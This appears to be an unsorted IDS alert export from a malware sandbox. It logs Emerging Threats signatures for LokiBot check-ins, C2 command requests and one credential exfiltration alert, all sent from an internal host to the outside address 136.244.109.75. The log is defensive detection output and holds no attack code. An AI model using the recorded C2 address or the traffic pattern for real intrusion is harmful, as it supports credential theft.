                          04/17/24-03:18:28.314689TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977780192.168.2.5136.244.109.75
                          04/17/24-03:17:42.872387TCP2025381ET TROJAN LokiBot Checkin4974580192.168.2.5136.244.109.75
                          04/17/24-03:17:07.139176TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971680192.168.2.5136.244.109.75
                          04/17/24-03:17:02.984312TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971380192.168.2.5136.244.109.75
                          04/17/24-03:17:07.139176TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971680192.168.2.5136.244.109.75
                          04/17/24-03:18:46.390927TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978980192.168.2.5136.244.109.75
                          04/17/24-03:17:19.154295TCP2025381ET TROJAN LokiBot Checkin4973080192.168.2.5136.244.109.75
                          04/17/24-03:18:49.380266TCP2025381ET TROJAN LokiBot Checkin4979180192.168.2.5136.244.109.75
                          04/17/24-03:17:31.711088TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973880192.168.2.5136.244.109.75
                          04/17/24-03:18:50.868001TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979280192.168.2.5136.244.109.75
                          04/17/24-03:18:32.922641TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978080192.168.2.5136.244.109.75
                          04/17/24-03:18:28.314689TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977780192.168.2.5136.244.109.75
                          04/17/24-03:18:32.922641TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978080192.168.2.5136.244.109.75
                          04/17/24-03:18:02.659962TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975980192.168.2.5136.244.109.75
                          04/17/24-03:18:44.899678TCP2025381ET TROJAN LokiBot Checkin4978880192.168.2.5136.244.109.75
                          04/17/24-03:17:58.145128TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975680192.168.2.5136.244.109.75
                          04/17/24-03:17:01.257517TCP2025381ET TROJAN LokiBot Checkin4971280192.168.2.5136.244.109.75
                          04/17/24-03:18:02.659962TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975980192.168.2.5136.244.109.75
                          04/17/24-03:18:23.842884TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977480192.168.2.5136.244.109.75
                          04/17/24-03:17:13.162928TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972680192.168.2.5136.244.109.75
                          04/17/24-03:17:47.288202TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974980192.168.2.5136.244.109.75
                          04/17/24-03:18:38.899573TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978480192.168.2.5136.244.109.75
                          04/17/24-03:17:27.158635TCP2025381ET TROJAN LokiBot Checkin4973580192.168.2.5136.244.109.75
                          04/17/24-03:16:56.772780TCP2025381ET TROJAN LokiBot Checkin4970980192.168.2.5136.244.109.75
                          04/17/24-03:17:13.162928TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972680192.168.2.5136.244.109.75
                          04/17/24-03:17:47.288202TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974980192.168.2.5136.244.109.75
                          04/17/24-03:18:47.882152TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979080192.168.2.5136.244.109.75
                          04/17/24-03:18:13.442138TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976780192.168.2.5136.244.109.75
                          04/17/24-03:18:20.835118TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977280192.168.2.5136.244.109.75
                          04/17/24-03:18:47.882152TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979080192.168.2.5136.244.109.75
                          04/17/24-03:18:20.835118TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977280192.168.2.5136.244.109.75
                          04/17/24-03:17:14.663282TCP2025381ET TROJAN LokiBot Checkin4972780192.168.2.5136.244.109.75
                          04/17/24-03:17:20.757055TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973180192.168.2.5136.244.109.75
                          04/17/24-03:17:41.291392TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974480192.168.2.5136.244.109.75
                          04/17/24-03:17:41.291392TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974480192.168.2.5136.244.109.75
                          04/17/24-03:18:13.442138TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976780192.168.2.5136.244.109.75
                          04/17/24-03:18:11.616140TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.5136.244.109.75
                          04/17/24-03:16:55.317148TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970880192.168.2.5136.244.109.75
                          04/17/24-03:16:55.317148TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970880192.168.2.5136.244.109.75
                          04/17/24-03:17:34.754471TCP2025381ET TROJAN LokiBot Checkin4974080192.168.2.5136.244.109.75
                          04/17/24-03:18:34.395592TCP2025381ET TROJAN LokiBot Checkin4978180192.168.2.5136.244.109.75
                          04/17/24-03:18:41.923839TCP2025381ET TROJAN LokiBot Checkin4978680192.168.2.5136.244.109.75
                          04/17/24-03:18:53.924913TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979480192.168.2.5136.244.109.75
                          04/17/24-03:17:10.136681TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972480192.168.2.5136.244.109.75
                          04/17/24-03:17:28.661125TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973680192.168.2.5136.244.109.75
                          04/17/24-03:17:30.128575TCP2025381ET TROJAN LokiBot Checkin4973780192.168.2.5136.244.109.75
                          04/17/24-03:16:58.235959TCP2025381ET TROJAN LokiBot Checkin4971080192.168.2.5136.244.109.75
                          04/17/24-03:18:40.424546TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978580192.168.2.5136.244.109.75
                          04/17/24-03:17:54.967221TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975480192.168.2.5136.244.109.75
                          04/17/24-03:17:59.618244TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975780192.168.2.5136.244.109.75
                          04/17/24-03:18:40.424546TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978580192.168.2.5136.244.109.75
                          04/17/24-03:18:31.393355TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977980192.168.2.5136.244.109.75
                          04/17/24-03:18:04.154071TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976080192.168.2.5136.244.109.75
                          04/17/24-03:17:59.618244TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975780192.168.2.5136.244.109.75
                          04/17/24-03:17:50.302449TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975180192.168.2.5136.244.109.75
                          04/17/24-03:18:31.393355TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977980192.168.2.5136.244.109.75
                          04/17/24-03:17:54.967221TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975480192.168.2.5136.244.109.75
                          04/17/24-03:18:10.084965TCP2025381ET TROJAN LokiBot Checkin4976580192.168.2.5136.244.109.75
                          04/17/24-03:18:04.154071TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976080192.168.2.5136.244.109.75
                          04/17/24-03:18:19.349314TCP2025381ET TROJAN LokiBot Checkin4977180192.168.2.5136.244.109.75
                          04/17/24-03:17:10.136681TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972480192.168.2.5136.244.109.75
                          04/17/24-03:17:51.797146TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975280192.168.2.5136.244.109.75
                          04/17/24-03:18:43.385034TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978780192.168.2.5136.244.109.75
                          04/17/24-03:17:44.338890TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974680192.168.2.5136.244.109.75
                          04/17/24-03:18:01.176692TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975880192.168.2.5136.244.109.75
                          04/17/24-03:18:22.368817TCP2025381ET TROJAN LokiBot Checkin4977380192.168.2.5136.244.109.75
                          04/17/24-03:17:17.652364TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972980192.168.2.5136.244.109.75
                          04/17/24-03:17:51.797146TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975280192.168.2.5136.244.109.75
                          04/17/24-03:17:08.603347TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972380192.168.2.5136.244.109.75
                          04/17/24-03:16:59.708947TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971180192.168.2.5136.244.109.75
                          04/17/24-03:17:22.632421TCP2025381ET TROJAN LokiBot Checkin4973280192.168.2.5136.244.109.75
                          04/17/24-03:17:17.652364TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972980192.168.2.5136.244.109.75
                          04/17/24-03:17:16.164912TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972880192.168.2.5136.244.109.75
                          04/17/24-03:17:39.820705TCP2025381ET TROJAN LokiBot Checkin4974380192.168.2.5136.244.109.75
                          04/17/24-03:18:35.861538TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978280192.168.2.5136.244.109.75
                          04/17/24-03:16:53.759072TCP2025381ET TROJAN LokiBot Checkin4970780192.168.2.5136.244.109.75
                          04/17/24-03:18:29.847908TCP2025381ET TROJAN LokiBot Checkin4977880192.168.2.5136.244.109.75
                          04/17/24-03:18:52.381113TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979380192.168.2.5136.244.109.75
                          04/17/24-03:16:59.708947TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971180192.168.2.5136.244.109.75
                          04/17/24-03:18:08.625526TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976480192.168.2.5136.244.109.75
                          04/17/24-03:18:35.861538TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978280192.168.2.5136.244.109.75
                          04/17/24-03:17:44.338890TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974680192.168.2.5136.244.109.75
                          04/17/24-03:17:45.817567TCP2025381ET TROJAN LokiBot Checkin4974880192.168.2.5136.244.109.75
                          04/17/24-03:18:16.378463TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976980192.168.2.5136.244.109.75
                          04/17/24-03:18:43.385034TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978780192.168.2.5136.244.109.75
                          04/17/24-03:18:52.381113TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979380192.168.2.5136.244.109.75
                          04/17/24-03:17:59.618244TCP2025381ET TROJAN LokiBot Checkin4975780192.168.2.5136.244.109.75
                          04/17/24-03:18:14.912121TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976880192.168.2.5136.244.109.75
                          04/17/24-03:17:02.984312TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971380192.168.2.5136.244.109.75
                          04/17/24-03:18:19.349314TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977180192.168.2.5136.244.109.75
                          04/17/24-03:18:07.152097TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976280192.168.2.5136.244.109.75
                          04/17/24-03:18:28.314689TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977780192.168.2.5136.244.109.75
                          04/17/24-03:18:04.154071TCP2025381ET TROJAN LokiBot Checkin4976080192.168.2.5136.244.109.75
                          04/17/24-03:18:46.390927TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978980192.168.2.5136.244.109.75
                          04/17/24-03:18:50.868001TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979280192.168.2.5136.244.109.75
                          04/17/24-03:18:53.924913TCP2025381ET TROJAN LokiBot Checkin4979480192.168.2.5136.244.109.75
                          04/17/24-03:18:46.390927TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978980192.168.2.5136.244.109.75
                          04/17/24-03:17:02.984312TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971380192.168.2.5136.244.109.75
                          04/17/24-03:18:02.659962TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975980192.168.2.5136.244.109.75
                          04/17/24-03:17:17.652364TCP2025381ET TROJAN LokiBot Checkin4972980192.168.2.5136.244.109.75
                          04/17/24-03:18:40.424546TCP2025381ET TROJAN LokiBot Checkin4978580192.168.2.5136.244.109.75
                          04/17/24-03:18:23.842884TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977480192.168.2.5136.244.109.75
                          04/17/24-03:18:37.366005TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978380192.168.2.5136.244.109.75
                          04/17/24-03:18:32.922641TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978080192.168.2.5136.244.109.75
                          04/17/24-03:18:50.868001TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979280192.168.2.5136.244.109.75
                          04/17/24-03:18:23.842884TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977480192.168.2.5136.244.109.75
                          04/17/24-03:18:37.366005TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978380192.168.2.5136.244.109.75
                          04/17/24-03:17:31.711088TCP2025381ET TROJAN LokiBot Checkin4973880192.168.2.5136.244.109.75
                          04/17/24-03:17:36.230211TCP2025381ET TROJAN LokiBot Checkin4974180192.168.2.5136.244.109.75
                          04/17/24-03:17:56.686682TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975580192.168.2.5136.244.109.75
                          04/17/24-03:18:26.814059TCP2025381ET TROJAN LokiBot Checkin4977680192.168.2.5136.244.109.75
                          04/17/24-03:17:22.632421TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973280192.168.2.5136.244.109.75
                          04/17/24-03:17:47.288202TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974980192.168.2.5136.244.109.75
                          04/17/24-03:18:47.882152TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979080192.168.2.5136.244.109.75
                          04/17/24-03:18:22.368817TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977380192.168.2.5136.244.109.75
                          04/17/24-03:18:22.368817TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977380192.168.2.5136.244.109.75
                          04/17/24-03:16:55.317148TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970880192.168.2.5136.244.109.75
                          04/17/24-03:17:04.956657TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971480192.168.2.5136.244.109.75
                          04/17/24-03:18:05.666467TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976180192.168.2.5136.244.109.75
                          04/17/24-03:17:25.655732TCP2025381ET TROJAN LokiBot Checkin4973480192.168.2.5136.244.109.75
                          04/17/24-03:17:39.820705TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974380192.168.2.5136.244.109.75
                          04/17/24-03:17:22.632421TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973280192.168.2.5136.244.109.75
                          04/17/24-03:17:56.686682TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975580192.168.2.5136.244.109.75
                          04/17/24-03:17:04.956657TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971480192.168.2.5136.244.109.75
                          04/17/24-03:18:25.351055TCP2025381ET TROJAN LokiBot Checkin4977580192.168.2.5136.244.109.75
                          04/17/24-03:18:29.847908TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977880192.168.2.5136.244.109.75
                          04/17/24-03:17:11.695407TCP2025381ET TROJAN LokiBot Checkin4972580192.168.2.5136.244.109.75
                          04/17/24-03:17:16.164912TCP2025381ET TROJAN LokiBot Checkin4972880192.168.2.5136.244.109.75
                          04/17/24-03:17:28.661125TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973680192.168.2.5136.244.109.75
                          04/17/24-03:17:37.986053TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974280192.168.2.5136.244.109.75
                          04/17/24-03:17:28.661125TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973680192.168.2.5136.244.109.75
                          04/17/24-03:17:19.154295TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973080192.168.2.5136.244.109.75
                          04/17/24-03:17:42.872387TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974580192.168.2.5136.244.109.75
                          04/17/24-03:17:33.230598TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973980192.168.2.5136.244.109.75
                          04/17/24-03:17:33.230598TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973980192.168.2.5136.244.109.75
                          04/17/24-03:17:48.803719TCP2025381ET TROJAN LokiBot Checkin4975080192.168.2.5136.244.109.75
                          04/17/24-03:17:14.663282TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972780192.168.2.5136.244.109.75
                          04/17/24-03:17:42.872387TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974580192.168.2.5136.244.109.75
                          04/17/24-03:17:10.136681TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972480192.168.2.5136.244.109.75
                          04/17/24-03:17:37.986053TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974280192.168.2.5136.244.109.75
                          04/17/24-03:17:50.302449TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975180192.168.2.5136.244.109.75
                          04/17/24-03:16:52.374211TCP2025381ET TROJAN LokiBot Checkin4970680192.168.2.5136.244.109.75
                          04/17/24-03:17:24.136611TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973380192.168.2.5136.244.109.75
                          04/17/24-03:17:50.302449TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975180192.168.2.5136.244.109.75
                          04/17/24-03:17:53.372679TCP2025381ET TROJAN LokiBot Checkin4975380192.168.2.5136.244.109.75
                          04/17/24-03:18:01.176692TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975880192.168.2.5136.244.109.75
                          04/17/24-03:17:08.603347TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972380192.168.2.5136.244.109.75
                          04/17/24-03:17:51.797146TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975280192.168.2.5136.244.109.75
                          04/17/24-03:18:43.385034TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978780192.168.2.5136.244.109.75
                          04/17/24-03:17:41.291392TCP2025381ET TROJAN LokiBot Checkin4974480192.168.2.5136.244.109.75
                          04/17/24-03:18:01.176692TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975880192.168.2.5136.244.109.75
                          04/17/24-03:18:08.625526TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976480192.168.2.5136.244.109.75
                          04/17/24-03:18:17.867642TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977080192.168.2.5136.244.109.75
                          04/17/24-03:18:20.835118TCP2025381ET TROJAN LokiBot Checkin4977280192.168.2.5136.244.109.75
                          04/17/24-03:18:52.381113TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979380192.168.2.5136.244.109.75
                          04/17/24-03:16:59.708947TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971180192.168.2.5136.244.109.75
                          04/17/24-03:17:20.757055TCP2025381ET TROJAN LokiBot Checkin4973180192.168.2.5136.244.109.75
                          04/17/24-03:16:50.877994TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970580192.168.2.5136.244.109.75
                          04/17/24-03:17:08.603347TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972380192.168.2.5136.244.109.75
                          04/17/24-03:18:17.867642TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977080192.168.2.5136.244.109.75
                          04/17/24-03:17:44.338890TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974680192.168.2.5136.244.109.75
                          04/17/24-03:18:08.625526TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976480192.168.2.5136.244.109.75
                          04/17/24-03:18:11.616140TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.5136.244.109.75
                          04/17/24-03:17:54.967221TCP2025381ET TROJAN LokiBot Checkin4975480192.168.2.5136.244.109.75
                          04/17/24-03:16:53.759072TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970780192.168.2.5136.244.109.75
                          04/17/24-03:16:58.235959TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971080192.168.2.5136.244.109.75
                          04/17/24-03:18:19.349314TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977180192.168.2.5136.244.109.75
                          04/17/24-03:18:14.912121TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976880192.168.2.5136.244.109.75
                          04/17/24-03:16:55.317148TCP2025381ET TROJAN LokiBot Checkin4970880192.168.2.5136.244.109.75
                          04/17/24-03:18:19.349314TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977180192.168.2.5136.244.109.75
                          04/17/24-03:17:11.695407TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972580192.168.2.5136.244.109.75
                          04/17/24-03:18:41.923839TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978680192.168.2.5136.244.109.75
                          04/17/24-03:17:28.661125TCP2025381ET TROJAN LokiBot Checkin4973680192.168.2.5136.244.109.75
                          04/17/24-03:17:48.803719TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975080192.168.2.5136.244.109.75
                          04/17/24-03:16:53.759072TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970780192.168.2.5136.244.109.75
                          04/17/24-03:17:11.695407TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972580192.168.2.5136.244.109.75
                          04/17/24-03:17:53.372679TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975380192.168.2.5136.244.109.75
                          04/17/24-03:18:41.923839TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978680192.168.2.5136.244.109.75
                          04/17/24-03:17:53.372679TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975380192.168.2.5136.244.109.75
                          04/17/24-03:17:13.162928TCP2025381ET TROJAN LokiBot Checkin4972680192.168.2.5136.244.109.75
                          04/17/24-03:18:37.366005TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978380192.168.2.5136.244.109.75
                          04/17/24-03:18:31.393355TCP2025381ET TROJAN LokiBot Checkin4977980192.168.2.5136.244.109.75
                          04/17/24-03:18:10.084965TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.5136.244.109.75
                          04/17/24-03:16:58.235959TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971080192.168.2.5136.244.109.75
                          04/17/24-03:18:14.912121TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976880192.168.2.5136.244.109.75
                          04/17/24-03:17:56.686682TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975580192.168.2.5136.244.109.75
                          04/17/24-03:18:29.847908TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977880192.168.2.5136.244.109.75
                          04/17/24-03:17:39.820705TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974380192.168.2.5136.244.109.75
                          04/17/24-03:17:22.632421TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973280192.168.2.5136.244.109.75
                          04/17/24-03:18:35.861538TCP2025381ET TROJAN LokiBot Checkin4978280192.168.2.5136.244.109.75
                          04/17/24-03:18:43.385034TCP2025381ET TROJAN LokiBot Checkin4978780192.168.2.5136.244.109.75
                          04/17/24-03:18:08.625526TCP2025381ET TROJAN LokiBot Checkin4976480192.168.2.5136.244.109.75
                          04/17/24-03:18:22.368817TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977380192.168.2.5136.244.109.75
                          04/17/24-03:17:44.338890TCP2025381ET TROJAN LokiBot Checkin4974680192.168.2.5136.244.109.75
                          04/17/24-03:16:59.708947TCP2025381ET TROJAN LokiBot Checkin4971180192.168.2.5136.244.109.75
                          04/17/24-03:17:39.820705TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974380192.168.2.5136.244.109.75
                          04/17/24-03:18:16.378463TCP2025381ET TROJAN LokiBot Checkin4976980192.168.2.5136.244.109.75
                          04/17/24-03:18:05.666467TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976180192.168.2.5136.244.109.75
                          04/17/24-03:17:04.956657TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971480192.168.2.5136.244.109.75
                          04/17/24-03:17:07.139176TCP2025381ET TROJAN LokiBot Checkin4971680192.168.2.5136.244.109.75
                          04/17/24-03:17:30.128575TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973780192.168.2.5136.244.109.75
                          04/17/24-03:18:05.666467TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976180192.168.2.5136.244.109.75
                          04/17/24-03:18:29.847908TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977880192.168.2.5136.244.109.75
                          04/17/24-03:17:19.154295TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973080192.168.2.5136.244.109.75
                          04/17/24-03:18:46.390927TCP2025381ET TROJAN LokiBot Checkin4978980192.168.2.5136.244.109.75
                          04/17/24-03:17:33.230598TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973980192.168.2.5136.244.109.75
                          04/17/24-03:18:49.380266TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979180192.168.2.5136.244.109.75
                          04/17/24-03:17:24.136611TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973380192.168.2.5136.244.109.75
                          04/17/24-03:17:19.154295TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973080192.168.2.5136.244.109.75
                          04/17/24-03:17:42.872387TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.5136.244.109.75
                          04/17/24-03:17:02.984312TCP2025381ET TROJAN LokiBot Checkin4971380192.168.2.5136.244.109.75
                          04/17/24-03:17:45.817567TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974880192.168.2.5136.244.109.75
                          04/17/24-03:17:45.817567TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974880192.168.2.5136.244.109.75
                          04/17/24-03:18:49.380266TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979180192.168.2.5136.244.109.75
                          04/17/24-03:18:50.868001TCP2025381ET TROJAN LokiBot Checkin4979280192.168.2.5136.244.109.75
                          04/17/24-03:17:01.257517TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971280192.168.2.5136.244.109.75
                          04/17/24-03:18:07.152097TCP2025381ET TROJAN LokiBot Checkin4976280192.168.2.5136.244.109.75
                          04/17/24-03:16:52.374211TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970680192.168.2.5136.244.109.75
                          04/17/24-03:18:44.899678TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978880192.168.2.5136.244.109.75
                          04/17/24-03:17:58.145128TCP2025381ET TROJAN LokiBot Checkin4975680192.168.2.5136.244.109.75
                          04/17/24-03:17:14.663282TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972780192.168.2.5136.244.109.75
                          04/17/24-03:17:37.986053TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974280192.168.2.5136.244.109.75
                          04/17/24-03:17:24.136611TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973380192.168.2.5136.244.109.75
                          04/17/24-03:16:56.772780TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970980192.168.2.5136.244.109.75
                          04/17/24-03:17:14.663282TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972780192.168.2.5136.244.109.75
                          04/17/24-03:18:34.395592TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978180192.168.2.5136.244.109.75
                          04/17/24-03:18:13.442138TCP2025381ET TROJAN LokiBot Checkin4976780192.168.2.5136.244.109.75
                          04/17/24-03:18:25.351055TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977580192.168.2.5136.244.109.75
                          04/17/24-03:17:34.754471TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974080192.168.2.5136.244.109.75
                          04/17/24-03:18:02.659962TCP2025381ET TROJAN LokiBot Checkin4975980192.168.2.5136.244.109.75
                          04/17/24-03:17:27.158635TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973580192.168.2.5136.244.109.75
                          04/17/24-03:18:26.814059TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977680192.168.2.5136.244.109.75
                          04/17/24-03:16:50.877994TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14970580192.168.2.5136.244.109.75
                          04/17/24-03:18:17.867642TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977080192.168.2.5136.244.109.75
                          04/17/24-03:18:26.814059TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977680192.168.2.5136.244.109.75
                          04/17/24-03:17:36.230211TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974180192.168.2.5136.244.109.75
                          04/17/24-03:17:27.158635TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973580192.168.2.5136.244.109.75
